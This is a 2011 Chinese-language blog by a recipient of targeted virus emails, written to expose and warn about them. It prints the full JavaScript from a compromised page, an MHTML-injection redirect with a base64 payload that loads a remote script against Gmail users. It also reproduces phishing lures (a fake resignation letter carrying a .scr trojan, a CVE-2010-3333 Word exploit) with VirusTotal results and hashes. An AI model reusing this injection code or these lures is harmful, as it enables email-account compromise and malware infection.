2011年3月22日星期二

又收到了病毒邮件 Fwd: 一起加油

高明也收到了:
http://www.flickr.com/photos/gaoming/5551894777/

他的检测结果:

通过telnet 80端口得到源码如下:

$ telnet www.solidaritycenter.org 80
Trying 198.65.135.49...
Connected to www.solidaritycenter.org.
Escape character is '^]'.
GET www.solidaritycenter.org/files/India.html

function twd() {
var sUserAgent = navigator.userAgent;
var isWin = (navigator.platform == "Win32") || (navigator.platform == "Windows");

if (isWin) {
var isWin2K = sUserAgent.indexOf("Windows NT 5.0") > -1 || sUserAgent.indexOf("Windows 2000") > -1;
var isWinXP = sUserAgent.indexOf("Windows NT 5.1") > -1 || sUserAgent.indexOf("Windows XP") > -1;
var isWin2003 = sUserAgent.indexOf("Windows NT 5.2") > -1 || sUserAgent.indexOf("Windows 2003") > -1;
if (isWin2K || isWinXP ||isWin2003) document.location="mhtml:https://mail.google.com/mail/h/nwnibaprolyc/?ServiceLogin=accounts&service=mail&passive=true&rm=false&continue=ServiceLogin&s=l&l=%250aContent-Type: multipart/related; boundary=boundary%250aa%250d%250d--boundary%250a%2520Content-Location:twd%250a%2520Content-Transfer-Encoding:base64%250d%250dPHNjcmlwdCBzcmM9aHR0cDovL3d3dy5zb2xpZGFyaXR5Y2VudGVyLm9yZy9maWxlcy9JbmRpYS5qcz48L3NjcmlwdD4=%250d%250d--boundary--%250a&!twd";

var isWinVista = sUserAgent.indexOf("Windows NT 6.0") > -1 || sUserAgent.indexOf("Windows Vista") > -1;
var isWin7 = sUserAgent.indexOf("Windows NT 6.1") > -1 || sUserAgent.indexOf("Windows 7") > -1;
if (isWin7 || isWinVista ) document.location="mhtml:https://mail.google.com/mail/h/nwnibaprolyc/?ServiceLogin=accounts&service=mail&passive=true&rm=false&continue=ServiceLogin&s=l&l=%0aContent-Type: multipart/related; boundary=boundary%0aa%0d%0d--boundary%0a%20Content-Location:twd%0a%20Content-Transfer-Encoding:base64%0d%0dPHNjcmlwdCBzcmM9aHR0cDovL3d3dy5zb2xpZGFyaXR5Y2VudGVyLm9yZy9maWxlcy9JbmRpYS5qcz48L3NjcmlwdD4=%0d%0d--boundary--%0a&!twd";

return "other"; 
}

twd();

Connection closed by foreign host.



---------- Forwarded message ----------
From: alf oic <[email protected]>
Date: 2011/3/23
Subject: 一起加油
To: [email protected]


必须承认,有些国家确实在努力改变现状,也许它现在做得还不够好,但是希望它能越来越好,让我们一起加油……
http://www.solidaritycenter.org/files/India.html

2011年3月6日星期日

Fwd: 您好,周总

附件中的 我的離職工作交接清單.rar 是病毒,解压后是 我的離職工作交接清單.scr  

0 VT Community user(s) with a total of 0 reputation credit(s) say(s) this sample is goodware. 0 VT Community user(s) with a total of 0 reputation credit(s) say(s) this sample is malware.
File name:
我的離職工作交接清單.scr
Submission date:
2011-03-06 18:52:20 (UTC)
Current status:

VT Community

not reviewed
 Safety score: - 
Antivirus Version Last Update Result
AhnLab-V3 2011.03.06.02 2011.03.06 -
AntiVir 7.11.4.84 2011.03.06 -
Antiy-AVL 2.0.3.7 2011.03.06 -
Avast 4.8.1351.0 2011.02.23 -
Avast5 5.0.677.0 2011.03.06 -
AVG 10.0.0.1190 2011.03.06 -
BitDefender 7.2 2011.03.06 Gen:Trojan.Heur.FU.cqX@aWSq48ni
CAT-QuickHeal 11.00 2011.03.06 -
ClamAV 0.96.4.0 2011.03.05 -
Commtouch 5.2.11.5 2011.03.05 -
Comodo 7894 2011.03.06 -
DrWeb 5.0.2.03300 2011.03.06 Trojan.Obfuscated.based.1
Emsisoft 5.1.0.2 2011.03.06 -
eSafe 7.0.17.0 2011.03.06 -
eTrust-Vet 36.1.8198 2011.03.04 -
F-Prot 4.6.2.117 2011.03.05 -
F-Secure 9.0.16440.0 2011.03.06 Gen:Trojan.Heur.FU.cqX@aWSq48ni
Fortinet 4.2.254.0 2011.03.06 -
GData 21 2011.03.06 Gen:Trojan.Heur.FU.cqX@aWSq48ni
Ikarus T3.1.1.97.0 2011.03.06 -
Jiangmin 13.0.900 2011.03.06 -
K7AntiVirus 9.92.4032 2011.03.05 -
Kaspersky 7.0.0.125 2011.03.06 -
McAfee 5.400.0.1158 2011.03.06 -
McAfee-GW-Edition 2010.1C 2011.03.06 -
Microsoft 1.6603 2011.03.06 -
NOD32 5931 2011.03.06 -
Norman 6.07.03 2011.03.06 W32/Obfuscated.D!genr
nProtect 2011-02-10.01 2011.02.15 -
Panda 10.0.3.5 2011.03.06 -
PCTools 7.0.3.5 2011.03.06 Backdoor.Bredolab
Prevx 3.0 2011.03.06 -
Rising 23.47.06.03 2011.03.06 -
Sophos 4.63.0 2011.03.06 -
SUPERAntiSpyware 4.40.0.1006 2011.03.06 -
Symantec 20101.3.0.103 2011.03.06 -
TheHacker 6.7.0.1.145 2011.03.06 -
TrendMicro 9.200.0.1012 2011.03.06 -
TrendMicro-HouseCall 9.200.0.1012 2011.03.06 -
VBA32 3.12.14.3 2011.03.04 -
VIPRE 8618 2011.03.06 -
ViRobot 2011.3.6.4343 2011.03.06 -
VirusBuster 13.6.237.0 2011.03.06 Trojan.Hupigon.Gen!Pac.6
Additional information
MD5   : 52e8c0d7b2572054198b2d4dc401bc47
SHA1  : fe33516c78c672e4a1cad5b79ba8c9caece7c12f
SHA256: 5c852ecd95b3f9dc3ec3f2682bb37acc5719ca280ecfa639af6d3e8d9d6f6270


---------- Forwarded message ----------
From: ceopey <[email protected]>
Date: 2011/3/6
Subject: 您好,周总
To: "zuola.com" <zuola.com@gmail.com>


尊敬的周总

    您好!

    非常感谢您自2009年以来一直对我的关心和指导,我非常怀念一直在您身边的工作和生活的日子,让我无时不刻都在于精神饱满状态,让我对未来充满了斗志。但非常抱歉今年没有工作做好,辜负了您的期望,同时也让您的工作业绩受到了牵连,我负有不可推卸的直接责任。

 

    我希望您能理解我的辞职决定,一直在海外工作这么多年,每一年与家人相聚的日子只有那么10多天,即使今年回国频繁,但真正跟家人在一直只有那么几天,现在我的孩子已经4岁多了,需要更多的父爱和教育,我的父母年事已高,需要儿女的照顾;同时,我个人确实事业心不够强,我更多的是希望幸福开心的家庭生活。我离职后将去参加MBA学习两年,给自己好好充充电和多陪陪家人,然后找一份职业培训讲师工作,我还是喜欢非常自由的无约束的工作环境。

    

    衷心感谢您的关怀和指导,相关工作已移交,已整理成清单附在附件,请您过目,保重! 

我的離職工作交接清單.rar
24K   Download  

2011年3月5日星期六

Fwd: report

附件中的 report.doc 被上传到  http://file.zuo.la/virusmail/2011MAR/report.doc.virus

又是病毒
0 VT Community user(s) with a total of 0 reputation credit(s) say(s) this sample is goodware. 0 VT Community user(s) with a total of 0 reputation credit(s) say(s) this sample is malware.
File name:
report.doc
Submission date:
2011-02-24 23:59:38 (UTC)
Current status:
finished
Result:
6 /43 (14.0%)
VT Community

not reviewed
 Safety score: - 
Antivirus Version Last Update Result
AhnLab-V3 2011.02.25.00 2011.02.24 -
AntiVir 7.11.3.230 2011.02.24 -
Antiy-AVL 2.0.3.7 2011.02.23 -
Avast 4.8.1351.0 2011.02.23 RTF:CVE-2010-3333
Avast5 5.0.677.0 2011.02.23 RTF:CVE-2010-3333
AVG 10.0.0.1190 2011.02.25 -
BitDefender 7.2 2011.02.25 -
CAT-QuickHeal 11.00 2011.02.24 -
ClamAV 0.96.4.0 2011.02.24 -
Commtouch 5.2.11.5 2011.02.24 CVE-2010-3333!Camelot
Comodo 7799 2011.02.24 -
DrWeb 5.0.2.03300 2011.02.25 -
Emsisoft 5.1.0.2 2011.02.24 -
eSafe 7.0.17.0 2011.02.24 -
eTrust-Vet 36.1.8182 2011.02.24 -
F-Prot 4.6.2.117 2011.02.24 -
F-Secure 9.0.16160.0 2011.02.24 -
Fortinet 4.2.254.0 2011.02.24 Data/CVE20103333.A!exploit
GData 21 2011.02.24 RTF:CVE-2010-3333
Ikarus T3.1.1.97.0 2011.02.24 -
Jiangmin 13.0.900 2011.02.24 -
K7AntiVirus 9.90.3949 2011.02.24 -
Kaspersky 7.0.0.125 2011.02.25 -
McAfee 5.400.0.1158 2011.02.25 -
McAfee-GW-Edition 2010.1C 2011.02.24 -
Microsoft 1.6603 2011.02.24 Exploit:Win32/CVE-2010-3333
NOD32 5905 2011.02.24 -
Norman 6.07.03 2011.02.24 -
nProtect 2011-02-10.01 2011.02.15 -
Panda 10.0.3.5 2011.02.24 -
PCTools 7.0.3.5 2011.02.24 -
Prevx 3.0 2011.02.25 -
Rising 23.46.03.06 2011.02.24 -
Sophos 4.61.0 2011.02.24 -
SUPERAntiSpyware 4.40.0.1006 2011.02.24 -
Symantec 20101.3.0.103 2011.02.25 -
TheHacker 6.7.0.1.139 2011.02.24 -
TrendMicro 9.200.0.1012 2011.02.24 -
TrendMicro-HouseCall 9.200.0.1012 2011.02.24 -
VBA32 3.12.14.3 2011.02.23 -
VIPRE 8527 2011.02.24 -
ViRobot 2011.2.24.4327 2011.02.24 -
VirusBuster 13.6.219.0 2011.02.24 -
Additional information
MD5   : 6fb137d0077b4aaa1c9d6eff31a9766b
SHA1  : 4c4eb2821b2e843791ab5918ef53b5a3ff67c7cd
SHA256: 1e3f7657ba136251dd708d9691bd9a5a46ab2eef4f4df4d1c5e7d9f2e03e79d6

VT Community




---------- Forwarded message ----------
From: volunteero <[email protected]>
Date: 2011/2/24
Subject: report
To: zuola.com@gmail.com


This is He xing,female,21years old ,report for reference material

report.docreport.doc
1K   View   Download  

周曙光的网络日志